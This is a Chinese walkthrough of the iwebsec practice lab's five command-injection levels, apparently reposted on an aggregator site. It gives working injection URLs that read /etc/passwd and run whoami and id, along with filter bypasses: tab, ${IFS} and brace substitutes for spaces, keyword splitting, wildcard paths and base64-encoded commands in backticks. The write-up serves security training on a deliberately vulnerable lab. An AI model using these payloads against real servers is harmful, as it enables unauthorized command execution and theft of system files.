iwebsec靶场 命令执行漏洞通关笔记

这篇具有很好参考价值的文章主要介绍了iwebsec靶场 命令执行漏洞通关笔记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。

什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞。

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

第一关

1.源码分析

打开第一关 命令执行漏洞,如上url的链接地址为http://192.168.71.151/exec/01.php

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

首先通过docker ps查看容器id,然后通过docker exec进入到docker容器的命令行界面

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 由于第一关的url为http://192.168.71.151/exec/01.php,那么网站的源码在docker中可以通过如下方式查看

cat /var/www/html/exec/01.php

 查看结果如下所示

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 分析源码的内容,如上所示参数ip的内容执行ping操作,并未做任何过滤操作,具有命令执行的漏洞,只需要在ip地址后加入命令连接符,然后再渗透添加其他命令即可进行渗透

2.利用命令执行漏洞

(1)参数为ip=127.0.0.1

http://192.168.71.151/exec/01.php?ip=127.0.0.1

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(2)参数为ip=127.0.0.1;whoami  这里使用分号作为分隔符,后接命令whoami

http://192.168.71.151/exec/01.php?ip=127.0.0.1;whoami

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(2)参数为ip=127.0.0.1;cat /etc/passwd 这里使用分号作为分隔符,后接命令cat /etc/passwd

http://192.168.71.151/exec/01.php?ip=127.0.0.1;cat%20/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

如上所示,渗透获取到敏感信息/etc/passwd 

(3)参数为ip=127.0.0.1;id 这里使用分号作为分隔符,后接命令id

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

第二关

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

1.源码分析

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

如上所示查看源码可知对于ip传入的参数过滤了空格

此时再次执行参数ip=cat /etc/passwd 则会报错,因为cat与文件路径/etc/passwd中间存在空格会被过滤掉

http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat /etc/passwd

也就是说http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat%20/etc/passwd 无效

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

2.命令执行漏洞空格绕过渗透

如下所示,空格绕过可以有很多中方法

<|{}|%09|${IFS}9|${IFS}|

 接下来根据选择其中几种进行尝试

(1)制表符绕过

%09是制表符的URL编码,可以通过%09来代替空格,绕过空格过滤
ip=127.0.0.1;cat /etc/passwd可以替换为ip=127.0.0.1;cat%09/etc/passwd

http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat%09/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(2)<绕过

ip=127.0.0.1;cat /etc/passwd可以替换为ip=127.0.0.1;cat</etc/passwd
http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat</etc/passwd
http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat%3C/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(3){}过滤

空格过滤可以使用{}绕过
ip=127.0.0.1;cat /etc/passwd可以更换为ip=127.0.0.1;{cat,/etc/passwd}
http://192.168.71.151/exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}

 iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 (4)${IFS}替换

ip=127.0.0.1;cat /etc/passwd
可以替换为ip=127.0.0.1;cat${IFS}/etc/passwd
http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat${IFS}/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(5)$IFS$9替换

ip=127.0.0.1;cat /etc/passwd可以替换为ip=127.0.0.1;cat$IFS$9/etc/passwd
http://192.168.71.151/exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

第三关

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

1.源码分析

如下所示,代码中过滤了cat关键字

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

很明显,因为过滤了cat关键字,那么传参ip=127.0.0.1;cat /etc/passwd 将失效,这是因为cat被过滤掉了

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 2.命令执行漏洞关键命令绕过渗透

(1)拼接绕过

可以使用a=ca;b=t;$a$b /etc/passwd绕过
即使用ip=127.0.0.1;a=ca;b=t;$a$b%20/etc/passwd进行替换
http://192.168.71.151/exec/03.php?ip=127.0.0.1;a=ca;b=t;$a$b%20/etc/passwdiwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(2)命令替换绕过

可以使用与cat功能类似的其他命令,如

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /etc/passwd 2>%261 //报错出文件内容

实战1:

http://192.168.71.151/exec/03.php?ip=127.0.0.1;sh%20/etc/passwd%202%3E%261

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

实战2:http://192.168.71.151/exec/03.php?ip=127.0.0.1;more%20/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 实战3:

ttp://192.168.71.151/exec/03.php?ip=127.0.0.1;head%20/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

实战4:http://192.168.71.151/exec/03.php?ip=127.0.0.1;sort%20/etc/passwd

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

第四关

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

1.源码分析

如下所示,直接过滤了

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 很明显因为过滤了关键字etc|passwd,这使得传参ip=127.0.0.1;cat /etc/passwd会渗透失效

 iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

2.命令执行漏洞通配符绕过渗透

使用通配符方法进行绕过渗透,​?字符代表单个字符,这样的话/etc/passwd可以分别将etc和passwd其中的1个或者是多个字符分别用?替换。注意,?不能匹配空字符。也就是说,它占据的位置必须有字符存在。

(1)实战1:

使用ip=127.0.0.1;cat /et?/pass??来替换ip=127.0.0.1;cat /etc/passwd

http://192.168.71.151/exec/04.php?ip=127.0.0.1;cat%20/et?/pass??

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

如上所示成功获取了/etc/passwd文件的内容

 (2)实战2:

 使用ip=127.0.0.1;cat /?tc/pa??wd来替换ip=127.0.0.1;cat /etc/passwd

http://192.168.71.151/exec/04.php?ip=127.0.0.1;cat%20/et?/pass??http://192.168.71.151/exec/04.php?ip=127.0.0.1;cat%20/?tc/pa??wd

http://192.168.71.151/exec/04.php?ip=127.0.0.1;cat%20/et?/pass??iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

第五关

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

1.源码分析

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 很明显因为过滤了id关键字,ip=127.0.0.1;id 这个命令无法渗透成功

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

2.命令执行漏洞base64编码绕过渗透

这个时候可以在自己的linux系统中将命令进行base64编码,然后再拿去目标请求中命令执行,使用base64的-d参数解码

(1)通过 echo id|base64获取base64编码

 echo id|base64

 如下所示,编码为aWQK

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

 (2)通过base64解码

echo aWQK|base64 -d

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

(3)base64编码绕过命令注入渗透

再次强调用反引号括起来的值会被当做命令执行,于是使用如下命令替换

ip=127.0.0.1;`echo aWQK|base64 -d`

http://192.168.71.151/exec/01.php?ip=127.0.0.1;`echo%20aWQK|base64%20-d`

iwebsec靶场通关,iwebsec靶场,web安全,iwebsec,命令执行漏洞,空格绕过,命令执行

如上渗透成功文章来源地址https://www.toymoban.com/news/detail-688115.html

到了这里,关于iwebsec靶场 命令执行漏洞通关笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 命令执行漏洞--ibos靶场(靶场环境是掌控安全的)

    命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种 ctrl+u:在view-source模式自动换行 危险函数 1. system()函数:直接执行命令,并且输出 2. exec()函数:默认显示最后一行结果,没有输出 3. shell_exec()函数:多行结果,没有输出 4. pa

    2024年04月16日
    浏览(36)
  • web安全不安全的反序列、命令执行漏洞解析

    web安全不安全的反序列、命令执行漏洞解析 1.不安全的反序列化 原理: ​ 序列化即是把对象转变为字节流,存放在内存、文件数据库中,而反序列化即是把字节流转变为对象。该漏洞的原因出自于如果应用对恶意构造的用户输入的数据进行反序列化,这样就会产生非预期的

    2024年02月06日
    浏览(36)
  • 【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻

    靶场安装请参考以下博客,既详细有提供工具: 【网络安全 --- xss-labs靶场】xss-labs靶场安装详细教程,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源)-CSDN博客 【网络安全 --- xss-labs通关】xss-labs靶场通关,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源) h

    2024年02月08日
    浏览(45)
  • 漏洞靶场——DVWA+命令执行漏洞

    DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞 DVWA搭建环境: PHP环境+DVWA源代码 https://github.com/digininja/DVWA/archive/master.zip 安装phpstudy 命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。 命令连接符 :

    2024年02月06日
    浏览(65)
  • 代码执行漏洞 | iwebsec

    00-代码执行漏洞原理 代码执行漏洞是指应用程序本身过滤不严,用户可以通过请求将代码注入到应用中执行。PHP代码执行漏洞可以把代码注入应用中最终到webserver去执行。这样的漏洞如果没有特殊的过滤,相当于一个web后门的存在。该漏洞主要由 等函数的参数过滤不严格导

    2024年02月09日
    浏览(86)
  • Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(52)
  • Web安全:WebGoat 靶场搭建(WEB漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(44)
  • 全面了解文件上传漏洞, 通关upload-labs靶场

    upload-labs是一个专门用于学习文件上传漏洞攻击和防御的靶场。它提供了一系列模拟文件上传漏洞的实验环境,用于帮助用户了解文件上传漏洞的原理和防御技术。 这个靶场包括了常见的文件上传漏洞类型,如文件名欺骗、文件类型欺骗、文件上传功能绕过等。通过练习不同

    2024年02月04日
    浏览(47)
  • 文件上传漏洞之upload-labs靶场实战通关

    目录 pass-01 pass-02 pass-03 pass-04 pass-06 pass-07 pass-08 pass-09 pass-10 pass-11 pass-12 pass-13 pass-14 pass-15 pass-16 pass-17 pass-18 pass-19 pass-20 pass-21   pass-01   pass-02 前端删除完验证函数后通过burp修改 content-type的类型   pass-03 pass-04 本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|

    2023年04月08日
    浏览(51)
  • Web安全:bWAPP 靶场搭建.(集成了各种常见漏洞和最新漏洞的开源Web应用程序)

    bWAPP是一个集成了了常见漏洞的 web 应用程序,目的是作为漏洞测试的演练场,帮助安全爱好者,开发人员和学生发现和防止Web漏洞。它有超过100个网络漏洞数据,包括所有主要的已知网络漏洞. Web安全:bWAPP 靶场搭建. 靶场安装步骤: 第一步:(1)安装 phpStudy. 第二步:(

    2024年02月09日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包